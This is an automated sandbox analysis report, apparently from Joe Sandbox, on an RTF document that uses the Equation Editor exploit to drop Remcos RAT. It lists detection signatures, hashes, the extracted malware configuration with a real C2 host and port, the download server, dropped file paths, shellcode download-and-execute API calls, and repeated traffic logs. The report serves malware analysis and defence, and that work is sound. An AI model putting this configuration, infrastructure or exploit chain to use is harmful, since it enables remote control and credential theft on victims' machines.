Windows Analysis Report
WC5Gv13cOQ.rtf

Overview

General Information

Sample name: WC5Gv13cOQ.rtf
renamed because original name is a hash value
Original sample name: 904af9fb7e5bee74577f430af1080585.rtf
Analysis ID: 1532435
MD5: 904af9fb7e5bee74577f430af1080585
SHA1: 71b79e6f053b89985d109d81670f2dce172775ae
SHA256: 98bcb2a98c5347e4409349f1605a7883a40a541cffc4aa62bf7c77b5160cdd20
Tags: rtf

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Remcos
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Document exploit detected (process start blacklist hit)
Drops VBS files to the startup folder
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Searches for Windows Mail specific files
Shellcode detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to execute programs as a different user
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

AV Detection

Source: WC5Gv13cOQ.rtf Avira: detected
Source: 14.2.svchost.exe.400000.0.unpack Malware Configuration Extractor: Remcos {"Version": "5.1.3 Pro", "Host:Port:Password": "107.173.4.16:2404", "Assigned name": "newest", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-FI789R", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\taskhostw[1].exe ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\directory\name.exe ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Roaming\taskhostw.exe ReversingLabs: Detection: 55%
Source: WC5Gv13cOQ.rtf ReversingLabs: Detection: 52%
Source: WC5Gv13cOQ.rtf Virustotal: Detection: 50%
Source: Yara match File source: 14.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.name.exe.d70000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.name.exe.d70000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.name.exe.28e0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.name.exe.28e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.394468723.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.394502954.0000000000794000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.854766910.0000000000234000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.854880979.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.365614526.0000000000D70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.394764051.00000000028E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: name.exe PID: 3580, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost.exe PID: 3592, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: name.exe PID: 3856, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost.exe PID: 3892, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\directory\name.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\taskhostw[1].exe Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext, 7_2_004338C8
Source: name.exe, 00000006.00000002.365614526.0000000000D70000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_27fe3722-c

Exploits

Source: Yara match File source: 14.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.name.exe.d70000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.name.exe.d70000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.name.exe.28e0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.name.exe.28e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.394468723.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.854880979.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.365614526.0000000000D70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.394764051.00000000028E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: name.exe PID: 3580, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost.exe PID: 3592, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: name.exe PID: 3856, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost.exe PID: 3892, type: MEMORYSTR
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Network connect: IP: 104.168.7.25 Port: 80
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\taskhostw.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Privilege Escalation

Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00407538 _wcslen,CoGetObject, 7_2_00407538
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: wntdll.pdb source: name.exe, 00000006.00000003.364862213.0000000002BC0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000006.00000003.364383190.0000000001150000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000D.00000003.394321762.0000000002BB0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000D.00000003.394032155.00000000029C0000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D5449B GetFileAttributesW,FindFirstFileW,FindClose, 5_2_00D5449B
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D5C7E8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 5_2_00D5C7E8
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D5C75D FindFirstFileW,FindClose, 5_2_00D5C75D
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D5F021 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 5_2_00D5F021
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D5F17E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 5_2_00D5F17E
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013F449B GetFileAttributesW,FindFirstFileW,FindClose, 6_2_013F449B
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013FC75D FindFirstFileW,FindClose, 6_2_013FC75D
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013FC7E8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 6_2_013FC7E8
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013FF17E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 6_2_013FF17E
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013FF021 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 6_2_013FF021
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013FF47F FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 6_2_013FF47F
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013F3833 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 6_2_013F3833
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013F3B56 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 6_2_013F3B56
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013FBD48 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 6_2_013FBD48
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose, 7_2_0040928E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 7_2_0041C322
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, 7_2_0040C388
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose, 7_2_004096A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose, 7_2_00408847
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00407877 FindFirstFileW,FindNextFileW, 7_2_00407877
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0044E8F9 FindFirstFileExA, 7_2_0044E8F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 7_2_0040BB6B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW, 7_2_00419B86
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 7_2_0040BD72
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 7_2_100010F1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_10006580 FindFirstFileExA, 7_2_10006580
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW, 7_2_00407CD2
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Windows\SysWOW64\config\systemprofile\
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_00683F21 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_00683F21
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_00683FC6 ShellExecuteW,ExitProcess, 2_2_00683FC6
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_00683F98 URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_00683F98
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_00683EA3 URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_00683EA3
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_00683F3B URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_00683F3B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_00683FEB ExitProcess, 2_2_00683FEB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_00683FB1 ShellExecuteW,ExitProcess, 2_2_00683FB1
Source: global traffic DNS query: name: geoplugin.net
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 178.237.33.50:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
